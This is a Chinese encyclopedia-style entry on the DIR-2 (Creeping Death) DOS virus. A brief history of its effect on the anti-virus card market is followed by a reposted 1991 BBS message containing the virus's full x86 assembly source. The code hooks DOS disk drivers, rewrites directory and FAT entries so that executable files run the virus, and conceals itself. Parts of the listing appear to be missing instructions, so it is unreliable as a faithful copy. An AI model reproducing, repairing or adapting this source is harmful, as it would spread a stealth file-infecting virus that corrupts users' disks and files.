

词条 DIR2病毒


一个可以 媲美CIH的病毒,不具有以往人们认定病毒的明显特征,它改写了DOS系统,使自己不被发现,但它确确实实是一个病毒。


1994年前后,瑞星公司推出了防病毒卡。是用防毒卡好,还是用防毒软件好?是当时人们争论的热点之一。防病毒卡插在电脑里,由于不可改写,没有病毒感染的危险,但能否防住未知病毒却没有定论。防病毒卡的生产厂家认为能够找到病毒的最基本特征,就能够防住所有已知和未知的病毒。 DIR2 病毒的出现彻底打破了防病毒卡公司的防线,它不具有以往人们认定病毒的明显特征,它改写了DOS系统,使自己不被发现,但它确确实实是一个病毒。

于是,防病毒卡一落千丈,而王江民的 KV300系列却脱颖而出,以其开放性和快速更新成为杀病毒市场上的盟主。





BBS: The Programmer"s Inn

Date: 11-24-91 (19:52) Number: 3544


To: ALL Recvd: NO

Subj: DIR-2 Conf: (16) VIRUS


; Creeping Death V 1.0


; (C) Copyright 1991 by VirusSoft Corp.

i13org = 5f8h

i21org = 5fch

org 100h

mov sp,600h

inc counter

xor cx,cx

mov ds,cx

lds ax,[0c1h]

add ax,21h

push ds

push ax

mov ah,30h

call jump

cmp al,4

sbb si,si

mov drive+2,byte ptr -1

mov bx,60h

mov ah,4ah

call jump

mov ah,52h

call jump

push es:[bx-2]

lds bx,es:[bx]

search: mov ax,[bx+si+15h]

cmp ax,70h

jne next

xchg ax,cx

mov [bx+si+18h],byte ptr -1

mov di,[bx+si+13h]

mov [bx+si+13h],offset header

mov [bx+si+15h],cs

next: lds bx,[bx+si+19h]

cmp bx,-1

jne search

jcxz install

pop ds

mov ax,ds

add ax,[3]

inc ax

mov dx,cs

dec dx

cmp ax,dx

jne no_boot

add [3],61h

no_boot: mov ds,dx

mov [1],8

mov ds,cx

les ax,[di+6]

mov cs:str_block,ax

mov cs:int_block,es


mov si,1

scan: dec si


cmp ax,1effh

jne scan

mov ax,2cah

cmp [si+4],ax

je right

cmp [si+5],ax

jne scan

right: lodsw

push cs

pop es

mov di,offset modify+1


xchg ax,si

mov di,offset i13org




mov dx,0c000h

fdsk1: mov ds,dx

xor si,si


cmp ax,0aa55h

jne fdsk4



mov cl,9

sal ax,cl

fdsk2: cmp [si],6c7h

jne fdsk3

cmp [si+2],4ch

jne fdsk3

push dx

push [si+4]

jmp short death

install: int 20h

file : db "c:",255,0

fdsk3: inc si

cmp si,ax

jb fdsk2

fdsk4: inc dx

cmp dh,0f0h

jb fdsk1

sub sp,4

death: push cs

pop ds

mov bx,[2ch]

mov es,bx

mov ah,49h

call jump

xor ax,ax

test bx,bx

jz boot

mov di,1

seek: dec di


jne seek

lea si,[di+2]

jmp short exec

boot: mov es,[16h]

mov bx,es:[16h]

dec bx

xor si,si

exec: push bx

mov bx,offset param

mov [bx+4],cs

mov [bx+8],cs

mov [bx+12],cs

pop ds

push cs

pop es

mov di,offset f_name

push di

mov cx,40

rep movsw

push cs

pop ds

mov ah,3dh

mov dx,offset file

call jump

pop dx

mov ax,4b00h

call jump

mov ah,4dh

call jump

mov ah,4ch

jump: pushf

call dword ptr cs:[i21org]


;--------Installation complete

i13pr: mov ah,3

jmp dword ptr cs:[i13org]

main: push ax ; driver

push cx ; strategy block

push dx

push ds

push si

push di

push es

pop ds

mov al,[bx+2]

cmp al,4 ; Input

je input

cmp al,8

je output

cmp al,9

je output

call in

cmp al,2 ; Build BPB

jne ppp ;

lds si,[bx+12h]

mov di,offset bpb_buf

mov es:[bx+12h],di

mov es:[bx+14h],cs

push es

push cs

pop es

mov cx,16

rep movsw

pop es

push cs

pop ds

mov al,[di+2-32]

cmp al,2

adc al,0


cmp [di+8-32],0

je m32

sub [di+8-32],ax

jmp short ppp

m32: sub [di+15h-32],ax

sbb [di+17h-32],0

ppp: pop di

pop si

pop ds

pop dx

pop cx

pop ax

rts: retf

output: mov cx,0ff09h

call check

jz inf_sec

call in

jmp short inf_dsk

inf_sec: jmp _inf_sec

read: jmp _read

read_: add sp,16

jmp short ppp

input: call check

jz read

inf_dsk: mov byte ptr [bx+2],4


lea si,[bx+0eh]

mov cx,8

save: lodsw

push ax

loop save

mov [bx+14h],1

call driver

jnz read_

mov byte ptr [bx+2],2

call in

lds si,[bx+12h]

mov ax,[si+6]

add ax,15

mov cl,4

shr ax,cl

mov di,[si+0bh]

add di,di


adc di,ax

push di


mov ax,[si+8]

test ax,ax

jnz more

mov ax,[si+15h]

mov dx,[si+17h]

more: xor cx,cx

sub ax,di

sbb dx,cx

mov cl,[si+2]

div cx

cmp cl,2

sbb ax,-1

push ax

call convert

mov byte ptr es:[bx+2],4

mov es:[bx+14h],ax

call driver

again: lds si,es:[bx+0eh]

add si,dx

sub dh,cl

adc dx,ax

mov cs:gad+1,dx

cmp cl,1

je small

mov ax,[si]

and ax,di

cmp ax,0fff7h

je bad

cmp ax,0ff7h

je bad

cmp ax,0ff70h

jne ok

bad: pop ax

dec ax

push ax

call convert

jmp short again

small: not di

and [si],di

pop ax

push ax

inc ax

push ax

mov dx,0fh

test di,dx

jz here

inc dx

mul dx

here: or [si],ax

pop ax

call convert

mov si,es:[bx+0eh]

add si,dx

mov ax,[si]

and ax,di

ok: mov dx,di

dec dx

and dx,di

not di

and [si],di

or [si],dx

cmp ax,dx

pop ax

pop di

mov cs:pointer+1,ax

je _read_

mov dx,[si]

push ds

push si

call write

pop si

pop ds

jnz _read_

call driver

cmp [si],dx

jne _read_

dec ax

dec ax

mul cx

add ax,di

adc dx,0

push es

pop ds

mov [bx+12h],2

mov [bx+14h],ax

test dx,dx

jz less

mov [bx+14h],-1

mov [bx+1ah],ax

mov [bx+1ch],dx

less: mov [bx+10h],cs

mov [bx+0eh],100h

call write

_read_: std

lea di,[bx+1ch]

mov cx,8

load: pop ax


loop load

_read: call in

mov cx,9


mov di,es:[bx+12h]

lds si,es:[bx+0eh]

sal di,cl

xor cl,cl

add di,si

xor dl,dl

push ds

push si

call find

jcxz no_inf

call write

and es:[bx+4],byte ptr 07fh

no_inf: pop si

pop ds

inc dx

call find

jmp ppp


find: mov ax,[si+8]

cmp ax,"XE"

jne com

cmp [si+10],al

je found

com: cmp ax,"OC"

jne go_on

cmp byte ptr [si+10],"M"

jne go_on

found: test [si+1eh],0ffc0h ; >4MB

jnz go_on

test [si+1dh],03ff8h ; <2048B

jz go_on

test [si+0bh],byte ptr 1ch

jnz go_on

test dl,dl

jnz rest

pointer: mov ax,1234h

cmp ax,[si+1ah]

je go_on

xchg ax,[si+1ah]

gad: xor ax,1234h

mov [si+14h],ax

loop go_on

rest: xor ax,ax

xchg ax,[si+14h]

xor ax,cs:gad+1

mov [si+1ah],ax

go_on: ;rol cs:gad+1,1

db 2eh,0d1h,6

dw offset gad+1

add si,32

cmp di,si

jne find


check: mov ah,[bx+1]

drive: cmp ah,-1

mov cs:[drive+2],ah

jne changed

push [bx+0eh]

mov byte ptr [bx+2],1

call in

cmp byte ptr [bx+0eh],1

pop [bx+0eh]

mov [bx+2],al

changed: ret

write: cmp byte ptr es:[bx+2],8

jae in

mov byte ptr es:[bx+2],4

mov si,70h

mov ds,si

modify: mov si,1234h

push [si]

push [si+2]

mov [si],offset i13pr

mov [si+2],cs

call in

pop [si+2]

pop [si]


driver: mov es:[bx+12h],1


db 09ah


dw ?,70h

db 09ah


dw ?,70h

test es:[bx+4],byte ptr 80h


convert: cmp ax,0ff0h

jae fat_16

mov si,3

xor cs:[si+gad-1],si

mul si

shr ax,1

mov di,0fffh

jnc cont

mov di,0fff0h

jmp short cont

fat_16: mov si,2

mul si

mov di,0ffffh

cont: mov si,512

div si

header: inc ax


counter: dw 0

dw 842h

dw offset main

dw offset rts

db 7fh

param: dw 0,80h,?,5ch,?,6ch,?

bpb_buf: db 32 dup(?)

f_name: db 80 dup(?)

;--------The End.





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更新时间:2025/3/4 4:53:56